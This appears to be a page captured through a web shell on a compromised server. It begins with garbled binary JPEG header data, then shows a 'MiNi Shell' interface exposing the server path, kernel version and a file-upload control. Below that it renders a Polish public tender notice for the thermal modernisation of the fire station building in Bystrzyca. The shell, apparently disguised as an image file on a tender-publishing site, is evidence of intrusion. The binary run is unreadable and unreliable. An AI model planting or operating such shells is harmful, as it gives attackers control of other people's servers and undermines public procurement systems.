JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20250814/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20250814/0037584701-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Termomodernizacja budynku OSP w Bystrzycy </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">OCHOTNICZA STRAZ POŻARNA W BYSTRZYCY</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Ochotnicza Straż Pożarna w Bystrzycy</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 690677573</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Bystrzyca 25</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Bystrzyca</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">39-124</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podkarpackie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL823 - Rzeszowski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">662360366</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">osp.bystrzyca.266@gmail.com</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://przetargi.iwierzyce.pl/#/home</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> Ochotnicza Straż Pożarna w Bystrzycy </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Ochotnicza Straż Pożarna w Bystrzycy </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Termomodernizacja budynku OSP w Bystrzycy </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-d06f7682-e7ce-4fda-9702-8565cedba6e7</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00375847</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-08-14</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://przetargi.iwierzyce.pl/#/home <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https//przetargi.iwierzyce.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">W postępowaniu o udzielenie<br/>zamówienia komunikacja między Zamawiającym,<br/>a Wykonawcami odbywa się przy użyciu Platformy Zamówień Publicznych ZETO PZP.<br/>Uwaga! Przed przystąpieniem do składania oferty, Wykonawca jest zobowiązany zapoznać się z Instrukcją korzystania z Platformy<br/>zakupowej.<br/>2) Zamawiający w sytuacjach awaryjnych może również komunikować się z Wykonawcami za pomocą poczty elektronicznej:<br/>osp.bystrzyca.266@gmail.com<br/>3) Na Platformie postępowanie prowadzone jest pod nazwą: Termomodernizacja budynku OSP w Bystrzycy<br/>4) Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych oraz instrukcja składania ofert i<br/>sposobu komunikowania się Zamawiającego z Wykonawcami, jest dostępna na stronie dotyczącej prowadzonego postępowania.<br/>5) Postępowanie dostępne jest pod adresem: https://przetargi.iwierzyce.pl<br/>6) Osobami uprawnionymi do kontaktu z Wykonawcami są:<br/>W zakresie proceduralnym: Grzegorz Mazek<br/>W zakresie merytorycznym: Skworzec Waldemar<br/>7) Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy do złożenia, zmiany, wycofania oferty lub<br/>wniosku oraz do komunikacji wynosi 150 MB.<br/>8) Jeżeli zamawiający lub wykonawca przekazują oświadczenia, wnioski, zawiadomienia oraz informacje przy użyciu środków<br/>komunikacji elektronicznej w rozumieniu ustawy z dnia 18 lipca 2002r. o świadczeniu usług drogą elektroniczną, każda ze stron na<br/>żądanie drugiej strony niezwłocznie potwierdza fakt ich otrzymania.<br/>9) W przypadku braku potwierdzenia otrzymania korespondencji przez Wykonawcę, Zamawiający domniema, że oświadczenia,<br/>wnioski, zawiadomienia oraz informacje wysłane przez Zamawiającego na adres Platformy lub adres e-mail podany przez<br/>Wykonawcę, zostały doręczone w sposób umożliwiający zapoznanie się z ich treścią.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z pkt. V SWZ.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zgodnie z pkt. V SWZ.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">OSP.271.3.2025.GM</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem projektu jest termomodernizacja budynku OSP w Bystrzycy. Problemem obiektu jest niska efektywność<br/>energetyczna, stosunkowo wysokie zapotrzebowanie na energię oraz wysokie koszty ogrzewania. Aktualne roczne zużycie<br/>energii pierwotnej w budynku OSP<br/>wynosi 38,878 MWh. Do potrzeb w zakresie efektywności energetycznej budynków należy termomodernizacja obiektu,celem zmniejszenia zapotrzebowania na energię i obniżenia kosztów związanych zapewnieniem komfortu cieplnego.<br/>Celem przedsięwzięcia jest poprawa efektywności energetycznej budynku OSP, oraz polepszenie stanu infrastruktury<br/>służącej utrzymaniu i zabezpieczeniu specjalistycznego sprzętu i urządzeń technicznych, wykorzystywanych w akcjach<br/>ratowniczych oraz podczas usuwania skutków zagrożeń, poprzez modernizację budynku OSP .<br/>Zadanie obejmuje swoim zakresem prace termomodernizacyjne w szczególności:<br/>- wykonanie ocieplenia elewacji,<br/>- demontaż i montaż nowych parapetów zewnętrznych,<br/>- wymiana okien zewnętrznych w ilości 3 szt.<br/>- wymiana drzwi zewnętrznych w ilości 4 szt.<br/>Ponadto w ramach inwestycji zaplanowane jest:<br/>- wymiana 6 szt. lamp zewnętrznych na Ledowe,<br/>- „obróbka” wentylacji zewn.,<br/>- demontaż i montaż nowych rur spustowych,<br/>- wykonanie nowego orynnowania,<br/>- obróbka kominów. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45421000-4 - Roboty w zakresie stolarki budowlanej</p> <p class="mb-0">45261210-9 - Wykonywanie pokryć dachowych</p> <p class="mb-0">45450000-6 - Roboty budowlane wykończeniowe, pozostałe</p> <p class="mb-0">45111100-9 - Roboty w zakresie burzenia</p> <p class="mb-0">45111220-6 - Roboty w zakresie usuwania gruzu</p> <p class="mb-0">45262110-5 - Demontaż rusztowań</p> <p class="mb-0">45262120-8 - Wznoszenie rusztowań</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-10-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">IV.1.1) Kryteria oceny ofert:<br/>1. Zamawiający przyjmuje dwa kryteria oceny ofert, tj.:<br/>- cena – waga 60%<br/>- okres gwarancji jakości – waga 40%<br/>W kryterium „cena” (wartość brutto zamówienia) zostanie zastosowany wzór:<br/>cena [C ] = [cena oferowana minimalna : cena badanej oferty] x 60 pkt<br/>W kryterium „okres gwarancji jakości”:<br/>1) Wykonawca zdeklaruje okres gwarancji w Formularzu oferty.<br/>2) W kryterium „okres gwarancji [OG]” oferta może otrzymać maksymalnie 40 pkt. Kryterium będzie rozpatrywane w następujący<br/>sposób:<br/>Nazwa Kryterium<br/>Wartość punktowa wagi w %<br/>Okres gwarancji wynoszący min. 36 m-cy i max. 47 m-cy<br/>0<br/>Okres gwarancji wynoszący min. 48 m-cy i max. 59 m-cy<br/>20<br/>Okres gwarancji wynoszący 60 m-cy<br/>40<br/>3) Okres gwarancji powinien być podany w pełnych okresach tj. 36, 48 lub 60 miesięcy.<br/>4) W przypadku gdy Wykonawca zadeklaruje okres gwarancji krótszy niż 36 miesięcy, oferta Wykonawcy zostanie odrzucona jako<br/>niezgodna z SWZ, natomiast dłuższy niż 60 miesięcy nie będzie dodatkowo punktowany.<br/>5) Jeżeli Wykonawca nie wskaże oferowanego okresu gwarancji, Zamawiający uzna, że Wykonawca w ogóle nie oferuje gwarancji i<br/>ofertę odrzuci.<br/>Ogólna ocena będzie sumą pkt. dwóch kryteriów wagowych.<br/>Łączna punktacja = C+ OG<br/>Oferty oceniane będą punktowo. Maksymalna ilość punktów, wynosi 100 pkt.<br/>Ogłoszenie nr 2025/BZP 00317429/01 z dnia 2025-07-09<br/>2025-Ocena punktowa oferty będzie zaokrąglona do dwóch miejsc po przecinku.<br/>2. O wyborze oferty zamawiający zawiadamia niezwłocznie wykonawców, którzy ubiegali się<br/>o udzielenie zamówienia.<br/>3. Za ofertę najkorzystniejszą uznana zostanie oferta, która uzyska najwyższą liczbę punktów wyliczoną jako sumę punktów<br/>uzyskanych w w/w kryteriach.<br/>4. Jeżeli nie będzie można dokonać wyboru oferty najkorzystniejszej z uwagi na to, że dwie lub więcej ofert przedstawia taki sam<br/>bilans ceny i innych kryteriów oceny ofert, Zamawiający spośród tych ofert wybiera ofertę z niższą ceną.<br/>5. Zgodnie z art. 223 ustawy Pzp, w toku badania i oceny ofert Zamawiający może żądać od Wykonawcy wyjaśnień dotyczących<br/>treści złożonej oferty oraz przedmiotowych środków dowodowych lub innych składanych dokumentów lub oświadczeń.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie niniejszego zamówienia mogą ubiegać się Wykonawcy, którzy:<br/>- nie podlegają wykluczeniu w okolicznościach, o których mowa w art. 108 ust. 1 ustawy Pzp (obligatoryjne przesłanki<br/>wykluczenia Wykonawcy)<br/>1. Wykluczenie Wykonawcy następuje na okres o którym mowa w art. 111 ustawy Pzp.<br/>2. Zamawiający, na podstawie złożonych przez Wykonawcę oświadczeń, dokona oceny spełniania warunków podmiotowych<br/>według formuły spełnia - nie spełnia w oparciu o informacje zawarte w wymaganych oświadczeniach.<br/>3. Wykonawca może zostać wykluczony przez Zamawiającego na każdym etapie postępowania o udzielenie zamówienia.<br/>4. Ofertę Wykonawcy wykluczonego z postępowania uznaje się za odrzuconą.<br/>W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia, brak istnienia podstaw wykluczenia musi<br/>wykazać każdy z wykonawców samodzielnie.<br/>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie<br/>podlegają wykluczeniu na zasadach określonych w pkt. III.4.1, oraz spełniają określone przez Zamawiającego warunki<br/>udziału w postępowaniu dotyczące: III.3.1) Zdolności do występowania w obrocie gospodarczym: Zamawiający nie<br/>wyznacza szczegółowego warunku w tym zakresie. III.3.2) Uprawnień do prowadzenia określonej działalności gospodarczej<br/>lub zawodowej, o ile wynika to z odrębnych przepisów: Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.<br/>III.3.3) Sytuacji ekonomicznej lub finansowej: Zamawiający nie wyznacza szczegółowego warunku w powyższym zakresie.<br/>III.3.4) Zdolności technicznej lub zawodowej:<br/>Warunek dotyczący zdolności technicznej lub zawodowej Wykonawcy, poprzez określenie minimalnych wymagań<br/>dotyczących:<br/>a)<br/>Doświadczenia wykonawcy:<br/>Zamawiający uzna, że Wykonawca posiada doświadczenie niezbędne do realizacji zamówienia, jeżeli Wykonawca wykaże,<br/>że w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy<br/>w tym okresie, wykonał w sposób należyty zgodnie z przepisami prawa budowlanego i prawidłowo ukończył co najmniej<br/>jedną/1/ robotę budowlaną o wartości nie mniejszej niż 100 000,00 zł brutto (słownie: sto tysięcy i 00/100 złotych).1. Wykluczenie Wykonawcy następuje na okres o którym mowa w art. 111 ustawy Pzp.<br/>2. Zamawiający, na podstawie złożonych przez Wykonawcę oświadczeń, dokona oceny spełniania warunków podmiotowych według<br/>formuły spełnia - nie spełnia w oparciu o informacje zawarte w wymaganych oświadczeniach.<br/>3. Wykonawca może zostać wykluczony przez Zamawiającego na każdym etapie postępowania o udzielenie zamówienia.<br/>4. Ofertę Wykonawcy wykluczonego z postępowania uznaje się za odrzuconą.<br/>W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia, brak istnienia podstaw wykluczenia musi wykazać<br/>każdy z wykonawców samodzielnie. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">III. 4.1) PODSTAWY<br/>WYKLUCZENIA<br/>O udzielenie niniejszego zamówienia mogą ubiegać się Wykonawcy, którzy:<br/>- nie podlegają wykluczeniu w okolicznościach, o których mowa w art. 108 ust. 1 ustawy Pzp (obligatoryjne przesłanki wykluczenia<br/>Wykonawcy)</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający przed udzieleniem zamówienia wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w<br/>wyznaczonym terminie nie krótszym niż 5 dni od dnia wezwania, aktualnych na dzień złożenia podmiotowych środków dowodowych:<br/>1) Wykaz robót budowlanych wykonanych nie wcześniej niż w okresie 5 lat przed upływem<br/>terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy-w tym okresie, wraz z podaniem ich rodzaju, wartości,<br/>daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających<br/>czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa są referencje bądź inne dokumenty<br/>sporządzone przez podmiot na rzecz którego roboty budowlane zostały wykonywane, a jeżeli wykonawca z przyczyn niezależnych<br/>od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty – (wzór wykazu zostanie przekazany<br/>wykonawcy, którego oferta została najwyżej oceniona)<br/>Wykaz oświadczeń i dokumentów, potwierdzających spełnienie warunków udziału w postępowaniu oraz brak podstaw wykluczenia.<br/>1. Wykonawca do oferty dołącza aktualne na dzień składania oświadczenia:<br/>a)<br/>o spełnieniu warunków udziału w postępowaniu - (zał. Nr 2 do SWZ)<br/>b)<br/>o nie podleganiu wykluczeniu z postępowaniu - (zał. Nr 3 do SWZ)<br/>INNE DOKUMENTY SKŁADANE WRAZ Z OFERTĄ:<br/>a) potwierdzenie wniesienia wadium - oryginał dokumentu wadialnego (w przypadku wnoszenia wadium w formie innej niż<br/>pieniężna) lub potwierdzenie przelewu (w przypadku wniesienia wadium w pieniądzu)<br/>b) zobowiązanie podmiotu udostępniającego zasoby lub inny dokument wraz z oświadczeniami - jeżeli dotyczy,<br/>c) oświadczenie wykonawców wspólnie ubiegających się o udzielenie zamówienia – jeżeli dotyczy<br/>d) pełnomocnictwo - jeżeli dotyczy<br/>e) kosztorys ofertowy - sporządzony na podstawie STWiORB i przedmiaru robót – nieobligatoryjny przy składaniu ofert, jednak<br/>będzie wymagany przed zawarciem umowy od<br/>Wykonawcy, którego oferta zostanie wybrana jako najkorzystniejsza, w celu wyodrębnienia poszczególnych zadań oraz ich wartości<br/>Uwagi do oświadczeń<br/>Wykonawca zamieszcza w oświadczeniach informacje o podmiotach trzecich, na których zasoby powołuje się Wykonawca<br/>dotyczące; braku istnienia wobec podmiotów trzecich podstaw wykluczenia, zakresu w jakim powołuje się Wykonawca w celu<br/>spełnienia warunków udziału w postępowaniu na zasoby podmiotu trzeciego.<br/>Wykonawcy składają oświadczenia oraz zobowiązanie w języku polskim i w formie elektronicznej lub w postaci elektronicznej<br/>opatrzonej podpisem zaufanym, lub podpisem osobistym osoby upoważnionej do reprezentowania wykonawców zgodnie z formą<br/>reprezentacji określoną w dokumencie rejestrowym właściwym dla formy organizacyjnej lub innym dokumencie<br/>Uwagi do dokumentów pełnomocnictwa<br/>Pełnomocnictwo do złożenia oferty musi być złożone w oryginale w takiej samej formie, jak składana oferta (t.j. w formie<br/>elektronicznej lub postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym). Dopuszcza się także złożenie<br/>elektronicznej kopii (skanu) pełnomocnictwa sporządzonego uprzednio w formie pisemnej, w formie elektronicznego poświadczenia<br/>sporządzonego stosownie do art. 97 § 2 ustawy z dnia 14 lutego 1991 r. – Prawo o notariacie, które to poświadczenie notariusz<br/>opatruje kwalifikowanym podpisem elektronicznym, bądź też poprzez opatrzenie skanu pełnomocnictwa sporządzonego uprzednio w<br/>formie pisemnej kwalifikowanym podpisem, podpisem zaufanym lub podpisem osobistym mocodawcy. Elektroniczna kopia<br/>pełnomocnictwa nie może być uwierzytelniona przez upełnomocnionego.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 2000 <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> III.3.6) Podmioty ubiegające się wspólnie o zamówienie.<br/>1. Wykonawcy mogą wspólnie (konsorcjum, spółka cywilna) ubiegać się o udzielenie zamówienia. W takim przypadku<br/>ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w<br/>postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>Pełnomocnictwo należy dołączyć do oferty i powinno ono zawierać w szczególności wskazanie:<br/>- postępowania o udzielenie zamówienia publicznego, którego dotyczy;<br/>- wszystkich Wykonawców ubiegających się wspólnie o udzielenie zamówienia;<br/>- ustanowionego pełnomocnika oraz zakresu jego umocowania.2. Wszelka korespondencja będzie prowadzona wyłącznie z pełnomocnikiem.<br/>3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które<br/>roboty budowlane/dostawy/usługi wykonają poszczególni Wykonawcy. Wykonawcy składają oświadczenia w formie<br/>elektronicznej lub w postaci elektronicznej opatrzonej 